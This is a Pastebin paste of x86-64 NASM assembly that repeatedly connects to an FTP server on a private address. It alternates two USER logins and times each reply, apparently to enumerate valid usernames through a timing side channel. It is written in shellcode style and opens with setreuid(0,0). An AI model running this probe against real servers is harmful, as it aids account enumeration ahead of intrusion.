API tools faq
paste
Advertisement
0xACAB

ftp_timing.asm

0xACAB
Feb 11th, 2013
108
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 4.97 KB | None | 0 0
raw download clone embed print report
  1. BITS 64
  2. ;syscalls and arguments
  3.     %assign clock_gettime 228
  4.     %assign sysexit 60
  5.     %assign syssetreuid 133
  6.     %assign syswrite 1
  7.     %assign sysread 0
  8.     %assign sysclose 3
  9.     %assign syssocket 41
  10.     %assign sysconnect 42
  11.     %assign sysnanosleep 35
  12.     %assign CLOCK 0
  13.     %assign STDOUT 1
  14.     %assign SOCK_STREAM 1
  15.     %assign AF_INET 2
  16.  
  17. GLOBAL _start
  18.  
  19. section .data
  20.     login db "USER makhno", 10, 0
  21.     badlogin db "USER 0xACAB", 10, 0
  22.  
  23. section .bss
  24.     response resb 256
  25.     resplen resb 8
  26.  
  27. SECTION .text
  28.  
  29. _start:
  30.     ;int 3
  31.     ;mov r8, 0      ; we'll flip this at each new socket to determine which login to send
  32.     xor r8, r8
  33. setreuid:
  34.     xor rax, rax
  35.     add al, syssetreuid
  36.     xor rdi, rdi
  37.     xor rsi, rsi
  38.     syscall
  39.  
  40.     push rbp
  41.  
  42. tcpsocket:
  43.  
  44.     ;create TCP socket
  45.     xor rax, rax
  46.     add al, syssocket
  47.     xor rdi, rdi
  48.     xor rsi, rsi
  49.     xor rdx, rdx
  50.     ;mov rdi, AF_INET
  51.     mov dil, AF_INET
  52.     ;mov rsi, SOCK_STREAM
  53.     mov sil, SOCK_STREAM
  54.     syscall
  55.    
  56.     cmp r8, 1
  57.     je flip_off
  58. flip_on:
  59.     inc r8
  60.     jmp tcpconnect
  61. flip_off:
  62.     dec r8
  63.  
  64. tcpconnect:
  65.     ;set up stack and store sockfd
  66.     mov rbp, rsp
  67.     ;sub rsp, 0x8
  68.     sub spl, 0x8
  69.     mov QWORD [rbp-0x8], rax
  70.     ;int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
  71.     xor rax, rax
  72.     push rax
  73.     ;ip 192.168.1.8:21 + AF_INET
  74.     mov rax, 0x0801a8c015000002
  75.     push rax
  76.     mov rdi, QWORD[rbp-0x8]
  77.     mov rsi, rsp
  78.     xor rdx, rdx
  79.     ;mov rdx, 16
  80.     mov dl, 16
  81.     ;mov rax, sysconnect
  82.     xor rax, rax
  83.     mov al, sysconnect
  84.     syscall
  85.  
  86.     xor rcx, rcx
  87.     cmp rcx, rax
  88.     jne exit
  89.  
  90.     ;connect: use r9 as connect (0) or post send (1)
  91.     mov r9, 0
  92.  
  93. tcpread:
  94.     ;should be connected, try to read
  95.     ;mov rax, sysread
  96.     xor rax, rax
  97.     mov rdi, QWORD [rbp-0x8]
  98.     lea rsi, [response]
  99.     ;mov rdx, 0x100
  100.     xor rdx, rdx
  101.     mov  dx, 0x101
  102.     dec dl
  103.     syscall
  104.  
  105.     mov [resplen], rax
  106.     mov rsp, rbp
  107.     sub spl, 0x8
  108.    
  109.     xor rax, rax
  110.         cmp rax, r9
  111.         jne getendtime
  112.  
  113.     xor rax, rax
  114.     ;mov rax, syswrite
  115.     mov al, syswrite
  116.     ;mov rdi, STDOUT
  117.     xor rdi, rdi
  118.     mov dil, STDOUT
  119.     lea rsi, [response]
  120.     mov rdx, [resplen]
  121.     syscall
  122.     mov rsp, rbp
  123.     ;sub rsp, 0x8
  124.     sub spl, 0x8
  125.  
  126.  
  127.     ;int nanosleep(const struct timespec *req, struct timespec *rem)
  128.     ;sleep for 1 secs, rem=null
  129.     ;sub rsp, 0x50
  130.     sub spl, 0x50
  131.     xor rsi, rsi
  132.     inc rsi
  133.     mov [rbp-0x58], rsi
  134.     dec rsi
  135.     mov [rbp-0x50], rsi
  136.     ;mov rax, sysnanosleep
  137.     xor rax, rax
  138.     mov al, sysnanosleep
  139.     lea rdi, [rbp-0x58]
  140.     syscall
  141.     mov rsp, rbp
  142.     ;sub rsp, 0x8
  143.     sub spl, 0x8
  144.     nop
  145.  
  146. gettime:
  147.  
  148.     ;set up stack
  149.     ;sub rsp, 0x40
  150.     sub spl, 0x40
  151.     ;mov rax, clock_gettime
  152.     xor rax, rax
  153.     mov al, clock_gettime
  154.     ;mov rdi, CLOCK
  155.     xor rdi, rdi
  156.     lea rsi, [rbp-0x18]
  157.     syscall         ;get start time w/ real-time clock
  158.  
  159.     nop
  160.    
  161.     jmp tcpsend
  162. getendtime:
  163.     ;mov rax, clock_gettime
  164.     xor rax, rax
  165.     mov al, clock_gettime
  166.     ;mov rdi, CLOCK
  167.     xor rdi, rdi
  168.     lea rsi, [rbp-0x28]
  169.     syscall         ;get end time w/ real-time clock
  170.  
  171.     mov rdx, QWORD [rbp-0x28]
  172.     mov rax, QWORD [rbp-0x18]
  173.     mov rcx, rdx
  174.     sub rcx, rax
  175.     mov QWORD [rbp-0x30], rcx
  176.  
  177.     mov rdx, QWORD [rbp-0x20]
  178.     mov rax, QWORD [rbp-0x10]
  179.     mov rcx, rdx
  180.     sub rcx, rax
  181.     mov QWORD [rbp-0x30], rcx
  182.     nop
  183.  
  184.     ;make it one number: multiply secs by 1,000,000,000, add result with nanosecs
  185.     mov QWORD [rbp-0x38],1000000000
  186.     cvtsi2sd xmm0,QWORD [rbp-0x38]
  187.     cvtsi2sd xmm1,QWORD [rbp-0x40]
  188.     mulsd xmm1,xmm0
  189.     cvtsi2sd xmm0, QWORD [rbp-0x30]
  190.     addsd xmm0, xmm1
  191.     cvttsd2si rax, xmm0
  192.     mov QWORD [rbp-0x48], rax
  193.     nop
  194.  
  195. make_printable_number:
  196.     ;number should still be in rax...
  197.     xor rbx, rbx
  198.     xor rcx, rcx
  199.     xor rdx, rdx
  200.  
  201.     push rbx    ;0 byte null string
  202.     ;mov rbx, 10    ; decimal divider
  203.     mov bl, 10
  204. num_loop:
  205.     idiv rbx
  206.     ;add rdx, 0x30
  207.     add dl, 0x30
  208.     push dx
  209.     inc rcx
  210.     xor rdx, rdx
  211.  
  212.     cmp al, 0
  213.     jne num_loop
  214.  
  215.     imul rcx, 2
  216.  
  217. write_out:
  218.     xor rax, rax
  219.     ;mov rax, syswrite
  220.     mov al, syswrite
  221.     ;mov rdi, STDOUT
  222.     xor rdi, rdi
  223.     mov dil, STDOUT
  224.     lea rsi, [rsp]
  225.     mov rdx, rcx ; counter
  226.     syscall
  227.  
  228.     ;print linefeed
  229.     xor rax, rax
  230.     mov al, 0x0a
  231.     mov [rsp], rax
  232.    
  233.     ;mov rax, syswrite
  234.     mov al, syswrite
  235.     ;mov rdi, STDOUT
  236.     xor rdi, rdi
  237.     mov dil, STDOUT
  238.     lea rsi, [rsp]
  239.     ;mov rdx, 1         ; just one linefeed
  240.     xor rdx, rdx
  241.     add dl, 1
  242.     syscall
  243.  
  244. write_response:
  245.         xor rax, rax
  246.         ;mov rax, syswrite
  247.         mov al, syswrite
  248.     ;mov rdi, STDOUT
  249.     xor rdi, rdi
  250.     mov dil, STDOUT
  251.         lea rsi, [response]  
  252.         mov rdx, [resplen]
  253.         syscall
  254.  
  255.  
  256.  
  257. tcpclose:
  258.     ;mov rax, sysclose
  259.     xor rax, rax
  260.     mov al, sysclose
  261.     mov rdi, [rbp-0x8]
  262.     syscall
  263.     mov rsp, rbp
  264.  
  265.     ;sleep a second
  266.     ;mov rax, sysnanosleep
  267.         xor rax, rax
  268.     add al, sysnanosleep
  269.     xor rsi, rsi
  270.     lea rdi, [rbp-0x58]
  271.         syscall
  272.  
  273.     ;jump back up and repeat
  274.     jmp tcpsocket
  275.  
  276. exit:
  277.     xor rax, rax
  278.     add al, sysexit
  279.     xor rdi, rdi        ; return code (0)
  280.     syscall         ; bye
  281.  
  282.  
  283. tcpsend:
  284.     mov r9, 1
  285.     ;mov rax, syswrite
  286.     xor rax, rax
  287.     inc al
  288.     mov rdi, QWORD [rbp-0x8]
  289.    
  290.     cmp r8, 1
  291.     je bad_login
  292. good_login:
  293.     mov rsi, login
  294.     jmp login_send
  295. bad_login:
  296.     mov rsi, badlogin
  297. login_send:
  298.     ;mov rdx, 12
  299.     xor rdx, rdx
  300.     mov dl, 12
  301.     syscall
  302.     jmp tcpread
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!